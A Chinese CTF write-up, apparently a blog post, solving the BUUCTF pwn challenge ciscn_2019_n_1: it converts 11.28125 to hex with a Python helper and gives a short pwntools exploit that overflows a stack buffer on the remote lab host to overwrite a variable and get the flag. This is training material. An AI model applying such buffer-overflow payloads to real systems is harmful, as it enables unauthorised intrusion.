pwn学习(4)BUUCTF-ciscn_2019_n_1(浮点数转十六进制脚本积累)

checksec一下

IDA打开,如果满足的条件达成,就可以get flag

找到栈溢出漏洞,输入可以覆盖到v2

将代码11.28125在内存中的十六进制表示出来,

浮点数转十六进制代码如下:

复制代码
import struct

def float_to_hex(f):
    return hex(struct.unpack('<I',struct.pack('<f',f))[0])
print(float_to_hex(11.28125))
#output(0x41348000)

exp:

复制代码
from pwn import *

p=remote('node4.buuoj.cn',25860)

payload=b'a'*(0x30-0x4)+p32(0x41348000)
p.sendline(payload)

p.interactive()

运行出来的结果:

flag{8a5e8279-51a2-4b3b-8959-4d3f9b19227f}
总结:

脚本积累:浮点数转十六进制代码

相关推荐
渣渣灰飞1 小时前
MySQL 系统学习 第二阶段 第三章 DQL(Data Query Language)第二节:WHERE 条件查询
sql·学习·mysql
心中有国也有家1 小时前
AtomGit Flutter 鸿蒙客户端:E-Brufen 架构设计
学习·flutter·华为·harmonyos
hssfscv2 小时前
QT的学习笔记4——QMainWindow、资源文件以及主要控件的介绍
笔记·qt·学习
小小的代码里面挖呀挖呀挖2 小时前
杰理蓝牙耳机开发--LE Audio与游戏耳机应用
笔记·单片机·物联网·学习
一楼的猫3 小时前
AI写作检测机制技术深度解析:200+维度检测、叙事指纹与网文AI辅助怎么过审
人工智能·学习·安全·chatgpt·ai写作
报错小能手4 小时前
OpenTenBase学习——分布式数据库 / 集群主流架构分类
学习
灵性(๑>ڡ<)☆5 小时前
Java学习笔记 --面向对象进阶
java·笔记·学习
β添砖java6 小时前
Ollama工具学习
学习
小巧的砖头6 小时前
使用SVN+CruiseControl+ANT实现持续集成之一
学习·算法
俭朴的奇异果7 小时前
MongoDB实战开发 【零基础学习,附完整Asp.net示例】
学习·mongodb·asp.net